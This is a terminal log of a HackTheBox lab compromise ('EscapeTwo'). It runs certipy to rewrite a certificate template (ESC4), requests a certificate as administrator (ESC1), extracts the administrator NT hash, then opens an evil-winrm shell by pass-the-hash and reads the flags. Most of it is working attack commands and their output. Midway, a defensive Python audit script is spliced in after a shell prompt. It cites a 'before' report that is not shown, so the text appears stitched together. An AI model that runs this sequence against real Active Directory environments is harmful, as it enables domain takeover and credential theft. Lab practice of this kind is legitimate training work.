┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad template -u ca_svc@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.148.204 -template DunderMifflinAuthentication -write-default-configuration
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Saving current configuration to 'DunderMifflinAuthentication.json'
[*] Wrote current configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Replacing:
[*] nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*] flags: 66104
[*] pKIDefaultKeySpec: 2
[*] pKIKeyUsage: b'\x86\x00'
[*] pKIMaxIssuingDepth: -1
[*] pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*] pKIExpirationPeriod: b'\x00@9\x87.\xe1\xfe\xff'
[*] pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*] pKIDefaultCSPs: ['2,Microsoft Base Cryptographic Provider v1.0', '1,Microsoft Enhanced Cryptographic Provider v1.0']
[*] msPKI-Enrollment-Flag: 0
[*] msPKI-Private-Key-Flag: 16
[*] msPKI-Certificate-Name-Flag: 1
[*] msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'DunderMifflinAuthentication'? (y/N): y
[*] Successfully updated 'DunderMifflinAuthentication'

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad find -u ca_svc -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -dc-ip 10.129.148.204 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC01-CA'
[*] Checking web enrollment for CA 'sequel-DC01-CA' @ 'DC01.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250917192542_Certipy.txt'
[*] Wrote text output to '20250917192542_Certipy.txt'
[*] Saving JSON output to '20250917192542_Certipy.json'
[*] Wrote JSON output to '20250917192542_Certipy.json'

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ cat 20250917192542_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC01-CA
DNS Name : DC01.sequel.htb
Certificate Subject : CN=sequel-DC01-CA, DC=sequel, DC=htb
Certificate Serial Number : 152DBD2D8E9C079742C0F3BFF2A211D3
Certificate Validity Start : 2024-06-08 16:50:40+00:00
Certificate Validity End : 2124-06-08 17:00:40+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : DunderMifflinAuthentication
Display Name : Dunder Mifflin Authentication
Certificate Authorities : sequel-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-09-17T16:23:27+00:00
Template Last Modified : 2025-09-17T16:25:01+00:00
Permissions
Object Control Permissions
Owner : SEQUEL.HTB\Enterprise Admins
Full Control Principals : SEQUEL.HTB\Authenticated Users
Write Owner Principals : SEQUEL.HTB\Authenticated Users
Write Dacl Principals : SEQUEL.HTB\Authenticated Users
[+] User Enrollable Principals : SEQUEL.HTB\Authenticated Users
[+] User ACL Principals : SEQUEL.HTB\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC4 : User has dangerous permissions.

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
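The two Certipy reports above show the same template before and after its ACL and flags were rewritten. As an added example (not from this writeup and not Certipy's own code), the following Python audit encodes the ESC1 and ESC4 conditions over those same fields, so a defender can run the check against an inventory of templates and see why the "after" state is exploitable and the "before" state is not. The Template dataclass, the group lists and the BEFORE/AFTER records are constructed from the values printed above and are an assumption, not Certipy's JSON schema.

```python
from __future__ import annotations
from dataclasses import dataclass, field

# Principals that effectively every domain account can act as.
BROAD_GROUPS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}
# EKUs that let a certificate be used for Kerberos PKINIT / client logon.
CLIENT_AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication",
                    "Smart Card Logon", "Any Purpose"}


@dataclass
class Template:
    """Subset of a Certipy template report needed for the audit (constructed, not Certipy's schema)."""
    name: str
    enabled: bool
    enrollee_supplies_subject: bool
    requires_manager_approval: bool
    authorized_signatures_required: int
    extended_key_usage: list[str]
    enrollment_rights: set[str]
    full_control: set[str]
    write_owner: set[str]
    write_dacl: set[str]
    write_property_enroll: set[str] = field(default_factory=set)


def strip_domain(principal: str) -> str:
    """'SEQUEL.HTB\\Cert Publishers' -> 'Cert Publishers'."""
    return principal.split("\\", 1)[-1]


def low_priv_hits(principals: set[str], user_groups: set[str]) -> list[str]:
    """Principals in an ACE set that a low-privileged user (member of user_groups) can act as."""
    reachable = BROAD_GROUPS | {strip_domain(g) for g in user_groups}
    return sorted(p for p in principals if strip_domain(p) in reachable)


def audit(t: Template, user_groups: set[str] = frozenset()) -> dict[str, list[str]]:
    """Return {'ESC1': [...], 'ESC4': [...]} for the conditions that hold on template t."""
    findings: dict[str, list[str]] = {}
    if not t.enabled:
        return findings

    # ESC1: a low-privileged enrollee can put an arbitrary UPN into the SAN of a
    # logon-capable certificate and nothing (approval, co-signatures) gates issuance.
    # GenericAll implies the Enroll extended right, so full-control principals count too.
    enrollable = low_priv_hits(t.enrollment_rights | t.full_control, user_groups)
    usable_for_logon = (not t.extended_key_usage
                        or bool(CLIENT_AUTH_EKUS & set(t.extended_key_usage)))
    if (t.enrollee_supplies_subject and usable_for_logon
            and not t.requires_manager_approval
            and t.authorized_signatures_required == 0 and enrollable):
        findings["ESC1"] = enrollable

    # ESC4: a low-privileged principal can rewrite the template object itself
    # (owner, DACL or its enrollment properties), which is exactly what turned the
    # harmless 'before' state into the ESC1 'after' state in the reports above.
    writable = low_priv_hits(t.full_control | t.write_owner | t.write_dacl
                             | t.write_property_enroll, user_groups)
    if writable:
        findings["ESC4"] = writable
    return findings


# Constructed from the two Certipy text reports: the template as originally published,
# and the same template after its ACL and flags were rewritten.
ADMINS = {"SEQUEL.HTB\\Domain Admins", "SEQUEL.HTB\\Enterprise Admins"}
BEFORE = Template(
    name="DunderMifflinAuthentication", enabled=True,
    enrollee_supplies_subject=False, requires_manager_approval=False,
    authorized_signatures_required=0,
    extended_key_usage=["Client Authentication", "Server Authentication"],
    enrollment_rights=set(ADMINS),
    full_control=ADMINS | {"SEQUEL.HTB\\Cert Publishers"},
    write_owner=ADMINS | {"SEQUEL.HTB\\Cert Publishers"},
    write_dacl=ADMINS | {"SEQUEL.HTB\\Cert Publishers"},
    write_property_enroll=set(ADMINS),
)
AFTER = Template(
    name="DunderMifflinAuthentication", enabled=True,
    enrollee_supplies_subject=True, requires_manager_approval=False,
    authorized_signatures_required=0,
    extended_key_usage=["Client Authentication"],
    enrollment_rights={"SEQUEL.HTB\\Authenticated Users"},
    full_control={"SEQUEL.HTB\\Authenticated Users"},
    write_owner={"SEQUEL.HTB\\Authenticated Users"},
    write_dacl={"SEQUEL.HTB\\Authenticated Users"},
)

if __name__ == "__main__":
    # Evaluate from the viewpoint of an account that is a member of Cert Publishers,
    # the group holding the write rights in the 'before' report.
    print("before:", audit(BEFORE, {"Cert Publishers"}))   # ESC4 only
    print("after: ", audit(AFTER))                          # ESC1 and ESC4
```

The fix for the "before" state is to remove Cert Publishers (and any other non-admin group) from the template's Full Control, Write Owner and Write DACL entries; the "after" state additionally needs Enrollee Supplies Subject cleared or manager approval enabled before the template can be safely re-enabled.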
└─$ certipy-ad req -username ca_svc@sequel.htb -hashes :3b181b914e7a9d5508ea1e20bc2b7fce -target dc01.sequel.htb -dc-ip 10.129.148.204 -dc-host dc01.sequel.htb -ca sequel-DC01-CA -template DunderMifflinAuthentication -upn administrator@sequel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 15
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ certipy-ad auth -pfx administrator.pfx -username administrator -domain sequel.htb -dc-ip 10.129.148.204
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@sequel.htb'
[*] Using principal: 'administrator@sequel.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/EscapeTwo]
└─$ evil-winrm -i 10.129.148.204 -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
DC01
*Evil-WinRM* PS C:\Users\Administrator\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.148.204
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt
10e1d59ef74dfb769ae12c844199c464
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\ryan\Desktop\user.txt
bde26ba827b32be73f1d19560047458e